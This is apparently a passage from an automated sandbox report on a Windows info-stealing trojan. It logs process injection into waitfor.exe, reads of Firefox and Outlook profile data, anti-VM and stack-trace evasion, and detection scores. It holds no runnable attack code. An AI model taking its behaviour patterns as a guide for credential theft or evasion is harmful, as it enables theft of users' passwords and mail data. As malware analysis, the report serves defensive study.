                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0483DAAC7_2_0483DAAC
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0484DAC67_2_0484DAC6
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04857A467_2_04857A46
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0485FA497_2_0485FA49
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047E5AA07_2_047E5AA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04813A6C7_2_04813A6C
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04815BF07_2_04815BF0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047DDBF97_2_047DDBF9
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0485FB767_2_0485FB76
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047BFB807_2_047BFB80
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_008222A07_2_008222A0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0083C0407_2_0083C040
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0081D16A7_2_0081D16A
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0081D1707_2_0081D170
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0081B3807_2_0081B380
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0081D3907_2_0081D390
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_008113A17_2_008113A1
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0081B4C47_2_0081B4C4
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0081B4D07_2_0081B4D0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_008259507_2_00825950
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_00823B5B7_2_00823B5B
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_00823B607_2_00823B60
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04ABE4757_2_04ABE475
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04ABE3547_2_04ABE354
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04ABD8D87_2_04ABD8D8
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04ABE80C7_2_04ABE80C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: String function: 0151EA12 appears 86 times
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: String function: 014F7E54 appears 109 times
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: String function: 014E5130 appears 58 times
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: String function: 0152F290 appears 105 times
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: String function: 0149B970 appears 283 times
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 0481F290 appears 105 times
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 047E7E54 appears 109 times
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 0478B970 appears 283 times
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 047D5130 appears 58 times
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 0480EA12 appears 86 times
                Source: suBpo1g13Q.exeStatic PE information: invalid certificate
                Source: suBpo1g13Q.exe, 00000000.00000002.1362958856.0000000008FA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs suBpo1g13Q.exe
                Source: suBpo1g13Q.exe, 00000000.00000002.1360738579.00000000053A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs suBpo1g13Q.exe
                Source: suBpo1g13Q.exe, 00000000.00000002.1356748428.0000000002B70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs suBpo1g13Q.exe
                Source: suBpo1g13Q.exe, 00000000.00000000.1329155415.0000000000732000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOGGCS.exe. vs suBpo1g13Q.exe
                Source: suBpo1g13Q.exe, 00000000.00000002.1358229387.0000000003B29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs suBpo1g13Q.exe
                Source: suBpo1g13Q.exe, 00000000.00000002.1355340537.0000000000DFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs suBpo1g13Q.exe
                Source: suBpo1g13Q.exe, 00000004.00000002.1636951956.0000000001007000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewaitfor.exej% vs suBpo1g13Q.exe
                Source: suBpo1g13Q.exe, 00000004.00000002.1637461688.000000000159D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs suBpo1g13Q.exe
                Source: suBpo1g13Q.exeBinary or memory string: OriginalFilenameOGGCS.exe. vs suBpo1g13Q.exe
                Source: suBpo1g13Q.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: suBpo1g13Q.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@12/12
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\suBpo1g13Q.exe.logJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\waitfor.exeFile created: C:\Users\user\AppData\Local\Temp\FxK39HI69Jump to behavior
                Source: suBpo1g13Q.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: suBpo1g13Q.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: waitfor.exe, 00000007.00000002.3803338370.0000000002BD5000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1827943912.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3803338370.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1827595373.0000000002B85000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1831995181.0000000002BB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: suBpo1g13Q.exeVirustotal: Detection: 38%
                Source: suBpo1g13Q.exeReversingLabs: Detection: 68%
                Source: unknownProcess created: C:\Users\user\Desktop\suBpo1g13Q.exe "C:\Users\user\Desktop\suBpo1g13Q.exe"
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess created: C:\Users\user\Desktop\suBpo1g13Q.exe "C:\Users\user\Desktop\suBpo1g13Q.exe"
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess created: C:\Users\user\Desktop\suBpo1g13Q.exe "C:\Users\user\Desktop\suBpo1g13Q.exe"
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeProcess created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
                Source: C:\Windows\SysWOW64\waitfor.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess created: C:\Users\user\Desktop\suBpo1g13Q.exe "C:\Users\user\Desktop\suBpo1g13Q.exe"Jump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess created: C:\Users\user\Desktop\suBpo1g13Q.exe "C:\Users\user\Desktop\suBpo1g13Q.exe"Jump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeProcess created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: suBpo1g13Q.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: suBpo1g13Q.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: suBpo1g13Q.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: OGGCS.pdbSHA256 source: suBpo1g13Q.exe
                Source: Binary string: waitfor.pdbGCTL source: suBpo1g13Q.exe, 00000004.00000002.1636951956.0000000001007000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000003.1875642312.000000000062B000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3809460967.0000000000618000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: waitfor.pdb source: suBpo1g13Q.exe, 00000004.00000002.1636951956.0000000001007000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000003.1875642312.000000000062B000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3809460967.0000000000618000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iBkWOgpZKSoi.exe, 00000006.00000002.3804555588.000000000035E000.00000002.00000001.01000000.0000000C.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1709108519.000000000035E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: suBpo1g13Q.exe, 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1638712535.00000000045AE000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1636800976.00000000043F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: suBpo1g13Q.exe, suBpo1g13Q.exe, 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, waitfor.exe, 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1638712535.00000000045AE000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1636800976.00000000043F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: OGGCS.pdb source: suBpo1g13Q.exe
                Source: suBpo1g13Q.exeStatic PE information: 0xD3B6A135 [Wed Jul 22 15:56:37 2082 UTC]
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0041F993 push edi; iretd 4_2_0041F99F
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0041A218 push ebp; ret 4_2_0041A219
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_00405CA0 push ds; iretd 4_2_00405CA1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_00403580 push eax; ret 4_2_00403582
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_00416E2A push esp; iretd 4_2_00416E2B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_00419764 push ebp; ret 4_2_004197A3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_004167F3 push FFFFFFBEh; retf 4_2_0041683D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A09AD push ecx; mov dword ptr [esp], ecx4_2_014A09B6
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047627FA pushad ; ret 7_2_047627F9
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0476225F pushad ; ret 7_2_047627F9
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0476283D push eax; iretd 7_2_04762858
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047909AD push ecx; mov dword ptr [esp], ecx7_2_047909B6
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0082E045 pushfd ; retn 1E1Fh7_2_0082E072
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_008261D0 push ebp; ret 7_2_00826220
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0082C402 push edi; iretd 7_2_0082C41C
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0082C410 push edi; iretd 7_2_0082C41C
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0081271D push ds; iretd 7_2_0081271E
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_00830B17 pushad ; retf 7_2_00830B18
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_00826C95 push ebp; ret 7_2_00826C96
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_00830C9B push edx; retf 7_2_00830C9C
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_00830C25 push cs; ret 7_2_00830C89
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_00823270 push FFFFFFBEh; retf 7_2_008232BA
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_00831320 pushfd ; iretd 7_2_00831321
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0082F5C0 push es; ret 7_2_0082F63B
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_008238A7 push esp; iretd 7_2_008238A8
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0081DA40 push 20634F79h; retf 7_2_0081DA84
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04AB44B3 push esp; retf 7_2_04AB44B5
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04AB5075 push ss; iretd 7_2_04AB5088
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04AC5242 push eax; ret 7_2_04AC5244
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04AB6252 pushfd ; retf 7_2_04AB625D
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04AB4F98 push ss; iretd 7_2_04AB5088
                Source: suBpo1g13Q.exeStatic PE information: section name: .text entropy: 7.260788180397824
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: suBpo1g13Q.exe PID: 7188, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeMemory allocated: 2B20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeMemory allocated: 4B20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeMemory allocated: 9130000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeMemory allocated: A130000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeMemory allocated: A350000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeMemory allocated: B350000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E096E rdtsc 4_2_014E096E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeWindow / User API: threadDelayed 2186Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeWindow / User API: threadDelayed 7785Jump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\waitfor.exeAPI coverage: 2.6 %
